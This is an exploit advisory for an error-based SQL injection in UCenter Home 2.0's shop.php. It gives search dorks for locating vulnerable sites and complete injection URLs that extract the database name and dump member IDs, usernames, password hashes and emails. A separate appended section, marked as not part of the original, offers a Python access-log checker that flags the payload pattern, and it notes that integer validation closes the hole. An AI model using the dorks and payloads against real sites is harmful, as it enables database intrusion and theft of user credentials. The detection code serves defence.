__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

For inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

DB : Okey.

You edit the DB `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
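
A defensive counterpart to the requests shown above, as an added example that is not part of the original advisory: a Python check over web access logs that flags `shop.php?ac=view` requests whose `shopid` is not a plain integer and names which parts of the error-based pattern are present. The log lines are constructed samples, and the function and marker names are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside an Apache/nginx "combined" access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Building blocks of the error-based payload quoted in the advisory.
MARKERS = {
    "rand-floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
    "group-by": re.compile(r"group\s+by", re.I),
    "concat-hex": re.compile(r"concat\s*\(.*0x[0-9a-f]{2}", re.I | re.S),
}

def inspect_line(line):
    """Return the findings for one access-log line ([] means nothing flagged)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    # The advisory names Shop.php, so compare the path case-insensitively.
    if not url.path.lower().endswith("/shop.php"):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes
    if params.get("ac", [""])[0].lower() != "view":
        return []
    findings = []
    for value in params.get("shopid", []):
        # A legitimate shop id is digits only; anything else is suspect.
        if not re.fullmatch(r"\d{1,10}", value):
            findings.append("shopid-not-integer")
            findings += [name for name, rx in MARKERS.items() if rx.search(value)]
    return findings

# Constructed sample log lines (documentation IP range, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 640',
    '203.0.113.4 - - [01/Jan/2024:10:00:11 +0000] "GET /space.php?uid=1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect_line(entry), entry.split('"')[1][:60])
```

The same integer-only rule, enforced in the application before `shopid` reaches the query, is what removes the injection point; the log check only surfaces attempts.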